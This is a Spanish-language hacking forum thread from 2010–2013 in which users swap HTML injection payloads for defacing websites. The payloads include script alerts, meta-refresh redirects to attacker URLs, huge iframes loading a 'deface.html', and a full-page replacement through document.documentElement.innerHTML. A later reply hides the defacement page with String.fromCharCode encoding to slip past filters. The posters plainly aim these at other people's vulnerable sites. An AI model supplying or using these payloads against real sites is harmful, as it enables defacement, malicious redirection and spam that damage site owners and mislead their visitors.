comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Sobre las diferentes HTMLi

  • 14 Respuestas
  • 4634 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado C1n0X

  • *
  • Underc0der
  • Mensajes: 22
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Agosto 22, 2010, 09:35:22 pm »
Bueno, tengo una idea que se me pasa por la cabeza, pero hay un problema xD no se cuántos códigos ni cuales son los de las htmli, osea conozco 3 pero sólo me sé 2...

1.- Alerta: <script>alert('Contenido alerta')</script>
2.- Redirección: <META HTTP-EQUIV="refresh" CONTENT="segundos; url=http://www.web.com">
3.- Este no se como se llama pero era algo de document no se qué que cuando lo pones, sale la web en blanco y lo que tu le hayas puesto es lo que sale en la web xD

Necesito:
Todos los que sepáis y sus códigos correspondientes

Gracias de antemano.
« Última modificación: Noviembre 23, 2014, 02:28:12 pm por Expermicid »

Desconectado LucaSthefano

  • *
  • Underc0der
  • Mensajes: 399
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Agosto 22, 2010, 09:48:35 pm »
No se si te serviran, pero te dejo algunos interesantes

No dejar seleccionar texto

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
<script language="Javascript">
<!-- Begin
function disableselect(e){
return false
}
function reEnable(){
return true
}
document.onselectstart=new Function ("return false")
if (window.sidebar){
document.onmousedown=disableselect
document.onclick=reEnable
}
// End -->
</script>

Abrir link en una nueva ventana

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
<a href="http://www.CheNico.com" target="_blank">Pauluk Computación</a>
Abrir una ventana con una imagen, podes manejar las medidas cambiando "Width" y "Height"

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
<a name="1"></a><A
onclick="window.open('MiFoto.jpg','Estructuras','toolbar=no,location=no,scrollbars=yes,directories=
no,status=no,menubar=no,resizable=no,width=400,height=475');"
href="#1"><b><font face="Verdana" size="2">Ejemplo</font></b></a>

Hacer un IFrame

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
<IFRAME src="http://mihost/deface.html" width="2000" height="1900" scrolling="auto" frameborder="0">
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
<IFRAME src="http://mihost/deface.jpg" width="2000" height="1900" scrolling="auto" frameborder="0">
Saludos compañero ;)

Desconectado C1n0X

  • *
  • Underc0der
  • Mensajes: 22
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #2 en: Agosto 22, 2010, 09:52:05 pm »
Bueno... a estas no le veo mucha utilidad sólo a las de iframes xD recuerda que son para las htmli no para programar una web...

Desconectado LucaSthefano

  • *
  • Underc0der
  • Mensajes: 399
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #3 en: Agosto 22, 2010, 09:57:21 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Bueno... a estas no le veo mucha utilidad sólo a las de iframes xD recuerda que son para las htmli no para programar una web...

Si, lo se. Todo depende de tu imaginacion, yo les puedo ddar mucho uso.

Puedo ir gastando la web de a poco, primero no dejo seleccionar texto, luego la lleno de SPAM y luego la redirecciono.

No me refiero a que lo valla a hacer, pero es lo que se me ocurre :)

Desconectado C1n0X

  • *
  • Underc0der
  • Mensajes: 22
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #4 en: Agosto 23, 2010, 10:15:09 am »
No se que uso le ves a poner lo de Abrir link en una ventana nueva xD

Desconectado SkillmaX

  • *
  • Underc0der
  • Mensajes: 106
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • http://lab-skillmax.blogspot.com/
« Respuesta #5 en: Agosto 23, 2010, 10:24:16 am »
C1n0x, tú le ves el uso a cambiar el index, Sthefano, te dá ideas de posibles cosas que puedes hacer, si usas un poco de imaginación puedes llegar hasta poner un outfile, en google aparecen diferentes scripts, lo cuales te pueden servir.

Desconectado LucaSthefano

  • *
  • Underc0der
  • Mensajes: 399
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #6 en: Agosto 23, 2010, 02:22:10 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
C1n0x, tú le ves el uso a cambiar el index, Sthefano, te dá ideas de posibles cosas que puedes hacer, si usas un poco de imaginación puedes llegar hasta poner un outfile, en google aparecen diferentes scripts, lo cuales te pueden servir.

Exacto, y ademas, abrir una ventana serviria como SPAM :)

Es solo cuestion de ideas, si no sabes como hacerlo, seguro google tiene la respuesta :P

Desconectado Harakiri

  • *
  • Underc0der
  • Mensajes: 92
  • Actividad:
    0%
  • Reputación 0
  • ~Lets hack like its 1998!
    • Ver Perfil
    • Email
« Respuesta #7 en: Agosto 23, 2010, 02:41:32 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
C1n0x, tú le ves el uso a cambiar el index, Sthefano, te dá ideas de posibles cosas que puedes hacer, si usas un poco de imaginación puedes llegar hasta poner un outfile, en google aparecen diferentes scripts, lo cuales te pueden servir.

Exacto, y ademas, abrir una ventana serviria como SPAM :)

Es solo cuestion de ideas, si no sabes como hacerlo, seguro google tiene la respuesta :P

No se que mierda sera poner un outfile pero con html injection se pueden hacer cosas asi No tienes permisos para ver links. Registrate o Entra con tu cuenta o No tienes permisos para ver links. Registrate o Entra con tu cuenta

No se que mas podria ser, en todo caso es lo que hay, ya no quedan muchas webs que dejen pasar un error tan miserable! en algunos foros tambien se da que los admins activan en uso de HTML para que, por ejemplo, sea mas facil postear videos o weas por el estilo Ej: No tienes permisos para ver links. Registrate o Entra con tu cuenta

No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado SkillmaX

  • *
  • Underc0der
  • Mensajes: 106
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • http://lab-skillmax.blogspot.com/
« Respuesta #8 en: Agosto 23, 2010, 03:44:46 pm »
Deberias mirarte lo que es un into out file, y más cuando estes en un panel que deje pasar html, o también se puede inyectar desde una SQL, miratelo mind.

Desconectado C1n0X

  • *
  • Underc0der
  • Mensajes: 22
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #9 en: Agosto 23, 2010, 06:15:22 pm »
Pero a ver, yo no quiero que me digáis nada de eso xDDDDDD a ver... yo quiero que me digáis codes para hacer cosas como estos que ya tengo:

- <script>alert('Contenido')</script>
- <META HTTP-EQUIV="refresh" CONTENT="0.00000001; url=http://rthacker.net">
- <h1>Texto</h1>
- <marquee>Texto</marquee>
- <IFRAME src="No tienes permisos para ver links. Registrate o Entra con tu cuenta" width="100000" height="100000" scrolling="auto" frameborder="0">
- <script>document.documentElement.innerHTML="<center><br><br><h1>Texto 1</h1><br><br><br><br><h3>Texto 2</h3><br><br><br><br><h3>Texto 3</h3>";</script> ó <script>document.documentElement.innerHTML="<center><br><br><h1>Texto 1</h1><br><br><br><br><h3>Texto 2</h3><br>";</script>

Me decís más? :$

Desconectado SkillmaX

  • *
  • Underc0der
  • Mensajes: 106
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • http://lab-skillmax.blogspot.com/
« Respuesta #10 en: Agosto 23, 2010, 06:46:55 pm »
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
<head><title>BUG</title></head><body bgcolor="black"><table border="1" bordercolor="green"  width="800" height="300"></tr><td height="20"><font size="15" color="red" align="center">XSS & HTML</font></td></tr></tr><td height="20"><font size="15" color="red" align="center">Unexploited</font></td></tr></tr><td height="20"><font size="15" color="red" align="center">Narrow your vars</font></td></tr></table></body>Corrige los fallos.<br>

Lo cogí de xtemp.
« Última modificación: Agosto 23, 2010, 06:50:04 pm por SkillmaX »

Desconectado C1n0X

  • *
  • Underc0der
  • Mensajes: 22
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #11 en: Agosto 23, 2010, 08:55:14 pm »
Ese no hace mucha gracia ponerlo xd bueno ya veréis la dinámica y me diréis más ê.ê luego veréis jejejejejeje

Desconectado SkillmaX

  • *
  • Underc0der
  • Mensajes: 106
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • http://lab-skillmax.blogspot.com/
« Respuesta #12 en: Agosto 24, 2010, 07:46:56 am »
c1n0x modificalo a tu gusto y todo solucionado.

Desconectado titiritero

  • *
  • Underc0der
  • Mensajes: 8
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #13 en: Noviembre 10, 2013, 11:02:55 am »
Eso que dices de que salga blanco se le llama "Full replace", el cual te deja meter varias etiquetas html dentro de tal, pero conseguí una forma de defacear mediante full replace, con tu index y todo. Cojes la index, vas a No tienes permisos para ver links. Registrate o Entra con tu cuenta traduces tu index a charcode, y la metes en este codigo:
<script> document.documentElement.innerHTML=(String.fromCharCode(Aquí tu index traducida a charcode)); </script>
Y buala!! Verás tu index tal y como es, para mi el mejor método a la hora de inyectar html :P

Desconectado alexander1712

  • *
  • Underc0der
  • Mensajes: 850
  • Actividad:
    0%
  • Reputación -2
    • Ver Perfil
    • El blog del programador
    • Email
« Respuesta #14 en: Noviembre 10, 2013, 01:27:14 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Eso que dices de que salga blanco se le llama "Full replace", el cual te deja meter varias etiquetas html dentro de tal, pero conseguí una forma de defacear mediante full replace, con tu index y todo. Cojes la index, vas a No tienes permisos para ver links. Registrate o Entra con tu cuenta traduces tu index a charcode, y la metes en este codigo:
<script> document.documentElement.innerHTML=(String.fromCharCode(Aquí tu index traducida a charcode)); </script>
Y buala!! Verás tu index tal y como es, para mi el mejor método a la hora de inyectar html :P

1º estás reviviendo un post de agosto del 2010.
2º no se que ganas tienen de ponerle nombre a códigos de javascript, nunca lo entendí, para mi siguen siendo cosas que puedes hacer con js, por lo que no puedo entender por que le llaman HTMLi y le ponen nombre a cada inyección.

habría que cerrar el post por revivir xD.

saludos!

 

¿Te gustó el post? COMPARTILO!



Dudas sobre el uso de "i2p" y "freenet"

Iniciado por achievement_unlocked

Respuestas: 2
Vistas: 989
Último mensaje Agosto 28, 2016, 10:14:59 pm
por seth
[DUDA] Duda sobre la liabilidad de PHP

Iniciado por fleshworm

Respuestas: 2
Vistas: 1052
Último mensaje Mayo 06, 2016, 09:29:38 pm
por fleshworm
¿Alguien me podría explicar sobre "Character Device Files" en linux?

Iniciado por proxy_lainux

Respuestas: 2
Vistas: 1394
Último mensaje Mayo 07, 2016, 12:23:06 pm
por proxy_lainux
Duda sobre libro visual basic 6 cliente servidor de michael macdonald

Iniciado por xavicibi

Respuestas: 2
Vistas: 1300
Último mensaje Marzo 16, 2015, 05:38:34 pm
por IJ[0]SEE
[SOLUCIONADO] ¿Algún curso, taller o libro sobre inteligencia artificial Python?

Iniciado por dolphin

Respuestas: 1
Vistas: 918
Último mensaje Septiembre 10, 2016, 03:39:20 pm
por blackdrake